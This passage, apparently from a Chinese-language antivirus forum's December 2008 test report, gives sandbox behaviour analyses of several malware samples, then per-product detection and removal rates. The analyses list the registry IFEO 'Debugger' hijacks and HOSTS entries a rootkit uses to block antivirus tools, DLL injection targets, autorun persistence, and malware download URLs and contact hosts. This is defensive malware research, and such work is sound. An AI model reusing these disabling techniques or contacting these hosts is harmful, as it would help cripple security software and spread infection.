Options\MPFTRAY.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ms.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N32ACAN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapw32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navrunr.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivir.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atrack.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avk.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsynmgr.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxonsol.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIND.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DAVPFW.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbg.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debu.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95_O.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EFINET32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorewclass.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fir.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ice.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMOON.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iom.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JED.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kabackreport.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kasmain.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kav32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPPMain.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRF.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVPreScan.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kwatch.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lamapp.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcafee.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoft.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mon.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moniker.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ms.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N32ACAN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapw32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navrunr.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe] o Debugger = "svchost.exe" 備註: HOSTS 文件修改: 127.0.0.1 www.360.cn 127.0.0.1 www.360safe.cn 127.0.0.1 www.360safe.com 127.0.0.1 www.chinakv.com 127.0.0.1 www.rising.com.cn 127.0.0.1 rising.com.cn 127.0.0.1 dl.jiangmin.com 127.0.0.1 jiangmin.com 127.0.0.1 www.jiangmin.com 127.0.0.1 www.duba.net 127.0.0.1 www.eset.com.cn 127.0.0.1 www.nod32.com 127.0.0.1 shadu.duba.net 127.0.0.1 union.kingsoft.com 127.0.0.1 www.kaspersky.com.cn 127.0.0.1 kaspersky.com.cn 127.0.0.1 virustotal.com 127.0.0.1 www.kaspersky.com 127.0.0.1 www.cnnod32.cn 127.0.0.1 www.lanniao.org 127.0.0.1 www.nod32club.com 127.0.0.1 www.dswlab.com 127.0.0.1 bbs.sucop.com 127.0.0.1 www.virustotal.com 127.0.0.1 tool.ikaka.com 建立連線: l11.6600.org 下載網頁: http://www.web179.cn/ad/count.asp?mac=00-00-00-00-00-00&os=Win XP&ver=2.5.1202&temp=242656&key=261380 使用了傳統技術的 IFEO 來阻止防毒軟體執行,並透過 DLL 注入的方式,隱藏樣 本執行的痕跡 還加載多個驅動程式,是一個 rootkit 級的 KillAV 回到第一頁 WinDefender2009.exe 的分析報告 一般資訊 分析日期 可執行 : 檔案類型 上傳者 : 分析者 : : : 2008-12-10 是 : EXE kitman231 integear 樣本骨幹圖 : WinDefender2009.exe └ k.txt └qmgr0.dat └qmgr1.dat └WinDefender 2009.lnk └WinDefender 2009.lnk └uninstall.exe └vb.ini └windef.exe └WinDefender.s1 └WinDefender.s2 └WinDefender.s3 └winnt.bmp WinDefender2009.exe 的行為分析 : 建立檔案 : WinDefender2009.exe //母體 C :\Windows\k.txt C :\Documents and Settings\All Users\Application Data\qmgr0.dat C :\Documents and Settings\All Users\Application Data\qmgr1.dat C :\Documents and Settings\[UserName]\Desktop\WinDefender 2009.lnk // 捷徑,無害 C :\Documents and Settings\[UserName]\Start Menu\Programs\WinDefender 2009.lnk //捷徑,無害 C :\Program File\suninstall.exe C :\Program File\vb.ini C :\Program File\windef.exe //主要生成物 C :\Program File\WinDefender.s1 C :\Program File\WinDefender.s2 C :\Program File\WinDefender.s3 C :\Program File\winnt.bmp 建立新的處理程序 : WinDefender2009.exe //母體 windef.exe //主要生成物 建立新的服務 : BITS(狀態:執行) 建立新的登錄檔 : [HKEY_CURRENT_USER\Software\WinDefender2009] * Path = "%ProgramFiles%\WinDefender" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ThemeMan ager] * SystemID = 0x00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] * WinDefender2009 = "%ProgramFiles%\WinDefender\windef.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninsta ll\WinDefender 2009] * UninstallString = "%ProgramFiles%\WinDefender\Uninstall.exe" * InstallLocation = "%ProgramFiles%\WinDefender" * DisplayName = "WinDefender 2009" * DisplayIcon = "%ProgramFiles%\WinDefender\windef.exe,0" * * * * DisplayVersion = "3.4" VersionMajor = 0x00000002 VersionMinor = 0x00000002 NoModify = 0x00000001 * NoRepair = 0x00000001 下載檔案 : http://09021030408721.cn/cfg1. php 分析結果 : 病毒類型 : Trojan-FakeAlert 病毒檔案名:Trojan2008.12.24@009 回到第一頁 樣本名:Cu.exe 類型:Worm-Autorun 病毒檔案名:Worm2008.12.24@001 上傳者:mizuhara 分析者:asusp4b533 分析日期:20081206 分析工具:ThreatExpert 可執行:是 建立檔案: c:\autorun.inf %Temp%\tmp3.tmp %Temp%\tmp5.tmp %Temp%\WER4848.dir00\appcompat.txt %Temp%\WER4848.dir00\manifest.txt %Temp%\WER4848.dir00\spoolsv.exe.hdmp %Temp%\WER4848.dir00\spoolsv.exe.mdmp %Programs%\homeview\Uninstall.lnk %ProgramFiles%\homeview\Uninstall.exe c:\resycled\boot.com %Windir%\Temp\tmp6.tmp 程序及記憶體行為: 執行檔案: %Temp%\jah32223.exe c:\resycled\boot.com DLL 遠端注入: %System%\dll.dll->%System%\spoolsv.exe 登錄檔建立行為: o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Uninstall\homeview o HKEY_CURRENT_USER\Software\homeview o HKEY_CURRENT_USER\Software\{NSINAME} o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*] + DocumentInfo = 0x00000047 + GlobalTip = 0x00000CD1 + AutoTip = "rfx???|?{`" + Reserved = 0x6B02F719 o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID] + (Default) = "{6BF52A52-394A-11D3-B153-00C04F79FAA6}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Uninstall\homeview] + UninstallString = ""%ProgramFiles%\homeview\Uninstall.exe"" + InstallLocation = "%ProgramFiles%\homeview" + DisplayName = "homeview" + DisplayIcon = "%ProgramFiles%\homeview\Uninstall.exe,0" o [HKEY_CURRENT_USER\Software\homeview] + (Default) = "%ProgramFiles%\homeview" o [HKEY_CURRENT_USER\Software\{NSINAME}] + Start Menu Folder = "homeview" 登錄檔修改行為: * [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent] o (Default) = 0x0000000C * [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurr ent] o (Default) = 0x0000000C 備註: 建立連線: 94.247.2.107:80(可能導致後門) 回到第一頁 樣本名:k08aww.exe 類型:Worm-Autorun 病毒檔案名:Worm2008.12.24@003 上傳者:mizuhara 分析者:asusp4b533 分析日期:20081206 分析工具:ThreatExpert 可執行:是 建立檔案: c:\autorun.inf %Temp%\9f.dll c:\k08aww.bat %System%\kavo.exe %System%\kavo0.dll %System%\kavo1.dll 程序及記憶體行為: 執行檔案: %System%\kavo.exe k08aww.exe 遠端建立記憶體空間: 建立於->%Windir%\explorer.exe DLL 遠端注入: %System%\kavo0.dll->%Windir%\explorer.exe 登錄檔建立行為: # [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru n] * kava = "%System%\kavo.exe" 登錄檔修改行為 # [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Explorer\Advanced\Folder\Hidden\SHOWALL] * CheckedValue = 0x00000000 備註: 下載檔案: http://www.1a123.com/jj/cc.rar->%Temp%\cc.rar 標準的 Kxvo 行為 回到第一頁 樣本名:Setup_trnovirfrech_c.exe 類型:Virus-All 病毒檔案名:Virus2008.12.24@001 上傳者:kitman231 分析者:asusp4b533 分析日期:20081206 分析工具:ThreatExpert 可執行:是 建立檔案: * %Temp%\.tt1.tmp * %Temp%\.tt6B.tmp * %Temp%\.tt1.tmp.vbs * %System%\blphc35dj0erc1.scr * %System%\lphc35dj0erc1.exe * %System%\phc35dj0erc1.bmp * %System%\Restore\MachineGuid.txt 程序及記憶體行為: 執行檔案: %System%\lphc35dj0erc1.exe blphc35dj0erc1.scr 遠端建立記憶體空間: 建立於->%System%\svchost.exe 修改服務: 服務名->System Restore Service 服務->%System%\svchost.exe -k netsvcs 狀態->Running 登錄檔建立行為: * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli cies\System * HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host * HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings * HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Run] o lphc35dj0erc1 = "%System%\lphc35dj0erc1.exe" so that lphc35dj0erc1.exe runs every time Windows starts * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier] o InstallID = "a4d60ab5-6f2e-4270-8461-df8594e006ee" * [HKEY_CURRENT_USER\Control Panel\Desktop] o ConvertedWallpaper = "%System%\phc35dj0erc1.bmp" o SCRNSAVE.EXE = "%System%\blphc35dj0erc1.scr" * [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Pol icies\System] o NoDispBackgroundPage = 0x00000001 o NoDispScrSavPage = 0x00000001 * [HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver] o EulaAccepted = 0x00000001 登錄檔修改行為: * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore] o DisableSR = 0x00000000 * [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Shell Folders] o AppData = "%Profiles%\NetworkService\Application Data" o Cache = "%Profiles%\NetworkService\Local Settings\Temporary Internet Files" * [HKEY_CURRENT_USER\Control Panel\Colors] o Background = "0 0 255" * [HKEY_CURRENT_USER\Control Panel\Desktop] o ScreenSaveActive = "1" o Wallpaper = "%System%\phc35dj0erc1.bmp" o WallpaperStyle = "0" o OriginalWallpaper = "%System%\phc35dj0erc1.bmp" 備註: 下載網頁:http://windowsupdate.microsoft.com localhost http://avxp-2008.net/images/1224467073/9d1f0e1489a543dec127d 3af79e71e0f/a4d60ab5-6f2e-4270-8461-df8594e006ee.gif 疑似為綜合型病毒,會安裝後門,並且特別對螢幕(Display)顯示做破壞(安裝讓 使用者以為 BSOD 的模擬螢幕保護程式) 回到第一頁 A-Squared Anti-Malware 4.0 防毒軟體版本: 4.0.0.67 病毒碼: 2,477,867 啟發式設定: 無 測試環境: Windows XP SP3 其他: 手動掃描設定 : 偵測後、手動選擇刪除 防毒軟體顯示: 19/19 實際檔案數: 19 移除檔案數: 19 剩餘檔案數: 0 未偵測到: 0 偵測到但未移除: 0 偵測率: 19/19 = 100% 移除率: 19/19 = 100% 剩餘檔案: 無 偵測到但未移除檔案: 無 偵測到但只能隔離的檔案: 無 測試人員: JusticeH 回到第一頁 Avira Antivir Personal 版本:8.2.0.337 引擎:8.02.00.45 病毒碼:7.01.01.37 啟發式:全面關閉 測試環境:Windows Vista Home Premium SP1 x86 其他:使用手動掃描且自動處理,偵測到即修復,無法修復即刪除 防毒軟體顯示:20/25 實際檔案數:19 移除檔案數:19 剩餘檔案數:0 未偵測到:0 偵測率:19/19 = 100% 移除率:19/19 = 100% 剩餘檔案(壓縮檔內物件): 無偵測但未移除: 無 偵測並隔離 無 測試人員:megakotaro 回到第一頁 費爾托斯特 V7R3 版本:7.3.1.23211 引擎:8.02.00.45 病毒碼:9.20.32419 啟發式:預設啟發(大眾模式) 測試環境:Windows XP SP3 x86 其他:手動掃描 +手動刪除 防毒軟體顯示:8/19 實際檔案數:19 移除檔案數:8 剩餘檔案數:11 未偵測到:11 偵測率:8/19 = 42.1% 移除率:8/19 = 42.1% 剩餘檔案(壓縮檔內物件): [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] 偵測但未移除: 無 偵測並隔離 無 測試人員:KINGYEH 回到第一頁 SearchGUI 防毒軟體版本:20080825 病毒碼日期:無 啟發式設定:預設啟發 測試環境:Windows XP SP3 x86 其他:手動掃描設定 : 無動作 防毒軟體顯示:17/19 實際檔案數:19 移除檔案數:0 剩餘檔案數:2 未偵測到:2 偵測到但未移除:17 偵測率:17/19 = 89.5% 移除率:0/19 = 0.0% 剩餘檔案: [email protected] [email protected] 偵測到但未移除檔案: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] 偵測到但只能隔離的檔案: 無 測試人員:asusp4b533 回到第一頁 Kaspersky Internet Security 防毒軟體版本:8.0.0.506 病毒碼日期:2008/12/25 啟發式設定:高啟發 測試環境:Windows Vista Ultimate SP1 x86 其他:無 防毒軟體顯示:19/ 58 實際檔案數:19 移除檔案數:19 剩餘檔案數:0 未偵測到:0 偵測到但未移除:0 偵測率:19/19 = 100 % 移除率:19/19 = 100 % 剩餘檔案: 無 偵測到但未移除檔案: 無 偵測到但只能隔離的檔案: 無 測試人員:Bug 回到第一頁 Dr.Web anti-virus 防毒軟體版本:4.44.5 病毒碼日期:2008/12/25 啟發式設定:預設啟發 測試環境:Windows XP SP2 x86 其他:手動掃描設定 : 偵測即刪除 防毒軟體顯示:13/44 